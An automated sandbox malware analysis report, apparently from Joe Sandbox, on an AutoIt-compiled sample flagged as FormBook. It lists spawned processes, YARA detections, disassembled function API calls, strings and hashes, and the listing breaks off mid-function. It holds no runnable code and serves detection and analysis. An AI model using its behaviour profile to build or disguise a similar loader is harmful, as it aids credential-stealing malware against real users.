Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3431711821.0000000002780000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	13:51:39
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\ctfmon.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\ctfmon.exe"
Imagebase:	0x8f0000
File size:	9'728 bytes
MD5 hash:	1B19D302D7FFA3D0901B3D990A4E8E12
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:51:39
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\systeminfo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\systeminfo.exe"
Imagebase:	0xd70000
File size:	76'800 bytes
MD5 hash:	36CCB1FFAFD651F64A22B5DA0A1EA5C5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3431429866.0000000004550000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3430419586.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3431547878.00000000045A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	13:51:52
Start date:	10/01/2025
Path:	C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe"
Imagebase:	0x6f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	13:52:09
Start date:	10/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6de060000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	1.5%
Signature Coverage:	6.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	69

Executed Functions

Function 00E93B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E93B68
IsDebuggerPresent.KERNEL32 ref: 00E93B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,00F552F8,00F552E0,?,?), ref: 00E93BEB

Part of subcall function 00E97BCC: _memmove.LIBCMT ref: 00E97C06

Part of subcall function 00EA092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E93C14,00F552F8,?,?,?), ref: 00EA096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00E93C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00F47770,00000010), ref: 00ECD281
SetCurrentDirectoryW.KERNEL32(?,00F552F8,?,?,?), ref: 00ECD2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F44260,00F552F8,?,?,?), ref: 00ECD33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 00ECD346

Part of subcall function 00E93A46: GetSysColorBrush.USER32(0000000F), ref: 00E93A50
Part of subcall function 00E93A46: LoadCursorW.USER32(00000000,00007F00), ref: 00E93A5F
Part of subcall function 00E93A46: LoadIconW.USER32(00000063), ref: 00E93A76
Part of subcall function 00E93A46: LoadIconW.USER32(000000A4), ref: 00E93A88
Part of subcall function 00E93A46: LoadIconW.USER32(000000A2), ref: 00E93A9A
Part of subcall function 00E93A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E93AC0
Part of subcall function 00E93A46: RegisterClassExW.USER32(?), ref: 00E93B16

Part of subcall function 00E939D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E93A03
Part of subcall function 00E939D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E93A24
Part of subcall function 00E939D5: ShowWindow.USER32(00000000,?,?), ref: 00E93A38
Part of subcall function 00E939D5: ShowWindow.USER32(00000000,?,?), ref: 00E93A41

Part of subcall function 00E9434A: _memset.LIBCMT ref: 00E94370
Part of subcall function 00E9434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E94415

Strings

runas, xrefs: 00ECD33A
This is a third-party compiled AutoIt script., xrefs: 00ECD279

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: 4c9713cee514168766d1ff9471532b9b8ade7596d2969888ddd23e9f8c212a80
Instruction ID: c98f3473dc179854cd7de4107545ab768f8de550a42584216b75549f89573ee2
Opcode Fuzzy Hash: 4c9713cee514168766d1ff9471532b9b8ade7596d2969888ddd23e9f8c212a80
Instruction Fuzzy Hash: 83515970D0870CAECF01EBB4DC15EFDBBB4AF45B05F005069F951B21A2DA71964AEB21

Function 00E949A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00E949CD

Part of subcall function 00E97BCC: _memmove.LIBCMT ref: 00E97C06

GetCurrentProcess.KERNEL32(?,00F1FAEC,00000000,00000000,?), ref: 00E94A9A
IsWow64Process.KERNEL32(00000000), ref: 00E94AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00E94AE7
FreeLibrary.KERNEL32(00000000), ref: 00E94AF2
GetSystemInfo.KERNEL32(00000000), ref: 00E94B23
GetSystemInfo.KERNEL32(00000000), ref: 00E94B2F

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: b5cb2eb724f8afa22c0055062b484c3f492447059ed3f95a674fbe32e1e18e44
Instruction ID: 5bbd7dee11fc1856d8051ed5bc675c6e87171a096a4a8ecf01a66aef46da98b7
Opcode Fuzzy Hash: b5cb2eb724f8afa22c0055062b484c3f492447059ed3f95a674fbe32e1e18e44
Instruction Fuzzy Hash: 2C91187188D7C0DECB31CB788550AEAFFF5AF2A304B04596ED0C7A3A41E271A509D759

Function 00E94E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00E94D8E,?,?,00000000,00000000), ref: 00E94E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E94D8E,?,?,00000000,00000000), ref: 00E94EB0
LoadResource.KERNEL32(?,00000000,?,?,00E94D8E,?,?,00000000,00000000,?,?,?,?,?,?,00E94E2F), ref: 00ECD937
SizeofResource.KERNEL32(?,00000000,?,?,00E94D8E,?,?,00000000,00000000,?,?,?,?,?,?,00E94E2F), ref: 00ECD94C
LockResource.KERNEL32(00E94D8E,?,?,00E94D8E,?,?,00000000,00000000,?,?,?,?,?,?,00E94E2F,00000000), ref: 00ECD95F

Strings

SCRIPT, xrefs: 00E94EA6

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 73da27cabf05ce144faecb56beacea1633cbf33dc831be2fcfa91a910de2eda4
Instruction ID: f0a4867355370e916260d8a2acc36faa2738f7af509a3148c1aaad6ad14e90c2
Opcode Fuzzy Hash: 73da27cabf05ce144faecb56beacea1633cbf33dc831be2fcfa91a910de2eda4
Instruction Fuzzy Hash: 8C1170B5240704BFDB218B65EC48FA77BBAFBC5B15F10826CF405DA290DB71EC059A60

Function 00E9FCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: 5d8d1a7d3bcfb4d9fcfdf8e07966723ac2ce392e8bb7ff68b48ed7f9a59f6095
Instruction ID: 8fe1b2ad3630aa415592bf1749ad4e59e4e28a08bd2c2df70e34bfe68338c19f
Opcode Fuzzy Hash: 5d8d1a7d3bcfb4d9fcfdf8e07966723ac2ce392e8bb7ff68b48ed7f9a59f6095
Instruction Fuzzy Hash: FB924A706043418FDB24DF14C480B6AB7E1FF99308F14996DE899AB3A2D775EC45CB92

Function 00EF445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00ECE398), ref: 00EF446A
FindFirstFileW.KERNELBASE(?,?), ref: 00EF447B
FindClose.KERNEL32(00000000), ref: 00EF448B

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 2ef659611f73887e07b02bea6636212da44c5e47df6f4116aaa88d0c8c10a669
Instruction ID: c29eb9511bf1251aff5b2942511f34e3ed06e69bfcef8468ba4cb012784b8a2b
Opcode Fuzzy Hash: 2ef659611f73887e07b02bea6636212da44c5e47df6f4116aaa88d0c8c10a669
Instruction Fuzzy Hash: F2E0D8724109086752106B38EC0D4FA775C9E05335F104715F935E10D0F7745904A595

Function 00EA09D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EA0A5B
timeGetTime.WINMM ref: 00EA0D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EA0E53
Sleep.KERNEL32(0000000A), ref: 00EA0E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00EA0EFA
DestroyWindow.USER32 ref: 00EA0F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EA0F20
Sleep.KERNEL32(0000000A,?,?), ref: 00ED4E83
TranslateMessage.USER32(?), ref: 00ED5C60
DispatchMessageW.USER32(?), ref: 00ED5C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00ED5C82

Strings

@GUI_CTRLID, xrefs: 00ED4F3A
@TRAY_ID, xrefs: 00ED578F
@GUI_CTRLHANDLE, xrefs: 00ED4FE4
@COM_EVENTOBJ, xrefs: 00ED54F0
@GUI_WINHANDLE, xrefs: 00ED4F8F

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4212290369-3242690629
Opcode ID: 76f35466436d17dbad37a75c9dc37da021f62940b43aa1d0cf270b4362d007d7
Instruction ID: 732b3507c494cea0d3e1a60e9cacc5a9dc1246953c4ac471f2d39e9b5acc71d2
Opcode Fuzzy Hash: 76f35466436d17dbad37a75c9dc37da021f62940b43aa1d0cf270b4362d007d7
Instruction Fuzzy Hash: 0AB2D071608741DFDB24DF24C884BAAB7E0FF85308F14591EE59AAB3A1CB71E845DB42

Function 00EF9155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00EF8F5F: __time64.LIBCMT ref: 00EF8F69

Part of subcall function 00E94EE5: _fseek.LIBCMT ref: 00E94EFD

__wsplitpath.LIBCMT ref: 00EF9234

Part of subcall function 00EB40FB: __wsplitpath_helper.LIBCMT ref: 00EB413B

_wcscpy.LIBCMT ref: 00EF9247
_wcscat.LIBCMT ref: 00EF925A
__wsplitpath.LIBCMT ref: 00EF927F
_wcscat.LIBCMT ref: 00EF9295
_wcscat.LIBCMT ref: 00EF92A8

Part of subcall function 00EF8FA5: _memmove.LIBCMT ref: 00EF8FDE
Part of subcall function 00EF8FA5: _memmove.LIBCMT ref: 00EF8FED

_wcscmp.LIBCMT ref: 00EF91EF

Part of subcall function 00EF9734: _wcscmp.LIBCMT ref: 00EF9824
Part of subcall function 00EF9734: _wcscmp.LIBCMT ref: 00EF9837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00EF9452
_wcsncpy.LIBCMT ref: 00EF94C5
DeleteFileW.KERNEL32(?,?), ref: 00EF94FB
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00EF9511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EF9522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EF9534

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 189c0a2ca39dc04e4ff2b12712d4801ed5a9cbd03009251f58bfb82f12103feb
Instruction ID: 73a7f33c08a6f67717109d7a2c528995e688e0ee6245e34f0a41b5658d5b5847
Opcode Fuzzy Hash: 189c0a2ca39dc04e4ff2b12712d4801ed5a9cbd03009251f58bfb82f12103feb
Instruction Fuzzy Hash: 0FC12CB1E0021DAADF21DF95CC85EEEB7B9AF85310F0050AAF609F6152DB309A458F65

Function 00E93015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00E93074
RegisterClassExW.USER32(00000030), ref: 00E9309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E930AF
InitCommonControlsEx.COMCTL32(?), ref: 00E930CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E930DC
LoadIconW.USER32(000000A9), ref: 00E930F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E93101

Strings

AutoIt v3 GUI, xrefs: 00E93090
TaskbarCreated, xrefs: 00E930A4
0, xrefs: 00E93056
+, xrefs: 00E9305D

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 6b77a1615370e35f39456abe32d3029f55e3a5b352e82d38c54de29509d6932a
Instruction ID: ece39560d12674f54cb5379cf3be6c3f7e959be9b445dc09a6a06e972449af76
Opcode Fuzzy Hash: 6b77a1615370e35f39456abe32d3029f55e3a5b352e82d38c54de29509d6932a
Instruction Fuzzy Hash: C2315871841309AFDB10CFA4E888ACDBFF0FB09711F14456EE680E62A0D3B90589DF51

Function 00E93041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00E93074
RegisterClassExW.USER32(00000030), ref: 00E9309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E930AF
InitCommonControlsEx.COMCTL32(?), ref: 00E930CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E930DC
LoadIconW.USER32(000000A9), ref: 00E930F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E93101

Strings

AutoIt v3 GUI, xrefs: 00E93090
TaskbarCreated, xrefs: 00E930A4
0, xrefs: 00E93056
+, xrefs: 00E9305D

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: c1fb42ac711a3215add00ac1a322154db86735c73e3205f1c99c70080582c321
Instruction ID: 603f7771a42dfcffab2d0318c2e3e66bb3f43f8eb812f4a803c36c156da3d819
Opcode Fuzzy Hash: c1fb42ac711a3215add00ac1a322154db86735c73e3205f1c99c70080582c321
Instruction Fuzzy Hash: 6421B4B191171CAFDB00DFA4E849ADDBBF4FB08B12F00812AF615A62A0D7B54548AF91

Function 00E9708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E94706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00F552F8,?,00E937AE,?), ref: 00E94724

Part of subcall function 00EB050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00E97165), ref: 00EB052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E971A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00ECE8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00ECE909
RegCloseKey.ADVAPI32(?), ref: 00ECE947
_wcscat.LIBCMT ref: 00ECE9A0

Strings

\, xrefs: 00ECE9C3
\Include\, xrefs: 00E97165
Include, xrefs: 00ECE8BF, 00ECE900
Software\AutoIt v3\AutoIt, xrefs: 00E9719E

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 449b0dbeb60204ad4be3a4ee0f60261aed06a452eac063c2b7cfed8f6e6f7af4
Instruction ID: f79fbefd7c614d9f3438990d247e2a12245dfcb32dceaca786bfdc7d595290ba
Opcode Fuzzy Hash: 449b0dbeb60204ad4be3a4ee0f60261aed06a452eac063c2b7cfed8f6e6f7af4
Instruction Fuzzy Hash: FC71AF715083059ECB00EF25EC419ABBBE8FF89310F80192EF595E72A1EB71D949DB52

Function 00E93A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00E93A50
LoadCursorW.USER32(00000000,00007F00), ref: 00E93A5F
LoadIconW.USER32(00000063), ref: 00E93A76
LoadIconW.USER32(000000A4), ref: 00E93A88
LoadIconW.USER32(000000A2), ref: 00E93A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E93AC0
RegisterClassExW.USER32(?), ref: 00E93B16

Part of subcall function 00E93041: GetSysColorBrush.USER32(0000000F), ref: 00E93074
Part of subcall function 00E93041: RegisterClassExW.USER32(00000030), ref: 00E9309E
Part of subcall function 00E93041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E930AF
Part of subcall function 00E93041: InitCommonControlsEx.COMCTL32(?), ref: 00E930CC
Part of subcall function 00E93041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E930DC
Part of subcall function 00E93041: LoadIconW.USER32(000000A9), ref: 00E930F2
Part of subcall function 00E93041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E93101

Strings

#, xrefs: 00E93AFB
AutoIt v3, xrefs: 00E93B05
0, xrefs: 00E93AF4

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 5f26b7a6998ceceed6fbb37f109563801c2f9fcc42238362afaf24df64407064
Instruction ID: f73898248adafc3c196c043ff644edb00795794bfca43fdde83309c6c8e27771
Opcode Fuzzy Hash: 5f26b7a6998ceceed6fbb37f109563801c2f9fcc42238362afaf24df64407064
Instruction Fuzzy Hash: 652148B0D1070CAFEF10DFA4EC19B9D7BB0FB08B16F00412AF604A62A1D3B65644AF84

Function 00E93633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00E936D2
KillTimer.USER32(?,00000001), ref: 00E936FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E9371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E9372A
CreatePopupMenu.USER32 ref: 00E9373E
PostQuitMessage.USER32(00000000), ref: 00E9374D

Strings

TaskbarCreated, xrefs: 00E93725

Memory Dump Source

